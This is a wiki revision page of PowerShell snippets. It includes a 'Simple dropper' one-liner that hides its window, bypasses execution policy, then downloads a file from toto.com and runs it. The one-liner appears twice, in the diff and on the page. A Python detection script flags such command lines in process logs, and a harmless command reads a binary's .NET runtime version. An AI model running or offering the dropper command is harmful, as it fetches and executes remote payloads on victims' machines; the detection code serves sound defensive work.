"PowerShell": difference between revisions
		
		
		
		
		
		
				
		
		
	
 (Page created with « Simple dropper    powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Te... »)  | 
				No edit summary  | 
				||
| Line 2: | Line 2: | ||
  powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')  | 
    powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')  | 
||
Find the framework version of a binary  | 
|||
  [Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion  | 
|||
  v2.0.50727  | 
|||
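Review bot: in the added "Find the framework version of a binary" section, the result line v2.0.50727 sits on its own indented line directly under the command, so it renders as a second command rather than as output; label it as the returned value. The property queried is ImageRuntimeVersion, so the heading would be more precise as "runtime version", and the user-specific path C:\Users\futex\Desktop\test.exe would be better as a neutral placeholder.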
Revision as of 31 October 2017, 14:40
Simple dropper
 powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
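For detection work, the traits of the one-liner above can be matched in process-creation logs. The following is an added example, not part of the original wiki page; the function names and the benign sample are hypothetical, and the accepted switch prefixes are assumptions. It goes slightly beyond the page by also matching the long forms of the switches.

```python
import re

# Full switch name -> (shortest prefix assumed to be accepted, extra aliases).
PARAMS = {
    "windowstyle": ("w", ()),
    "noprofile": ("nop", ()),
    "executionpolicy": ("ex", ("ep",)),
}
DOWNLOAD_RE = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'", re.I)
START_RE = re.compile(r"Start-Process\s*\(?\s*'([^']+)'", re.I)

# The command line shown on this page, and a benign line constructed for contrast.
PAGE_SAMPLE = r"""powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')"""
BENIGN_SAMPLE = r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"

def match_param(token):
    """Return the full switch name that a token abbreviates, or None."""
    if not token or token[0] not in "-/":
        return None
    name = token[1:].lower()
    for full, (shortest, aliases) in PARAMS.items():
        if name in aliases or (name.startswith(shortest) and full.startswith(name)):
            return full
    return None

def analyze(cmdline):
    """Collect the dropper traits present in one command line."""
    tokens = cmdline.split()
    findings = set()
    for i, tok in enumerate(tokens):
        full = match_param(tok)
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if full == "noprofile":
            findings.add("no_profile")
        elif full == "windowstyle" and nxt == "hidden":
            findings.add("hidden_window")
        elif full == "executionpolicy" and nxt == "bypass":
            findings.add("policy_bypass")
    dl = DOWNLOAD_RE.search(cmdline)
    if dl:
        findings.add("webclient_download")
        st = START_RE.search(cmdline)
        # Strongest signal: the file just written to disk is launched at once.
        if st and st.group(1).lower() == dl.group(2).lower():
            findings.add("runs_downloaded_file")
    return findings

def verdict(cmdline):
    """Alert when a download-and-run chain is combined with a stealth switch."""
    f = analyze(cmdline)
    stealth = f & {"hidden_window", "no_profile", "policy_bypass"}
    return "alert" if "runs_downloaded_file" in f and stealth else "ok"
```

Feed `verdict` the command-line field of process-creation events (for example Sysmon event ID 1 or Windows event 4688 with command-line auditing enabled).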
Find the framework version of a binary
 [Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion
 v2.0.50727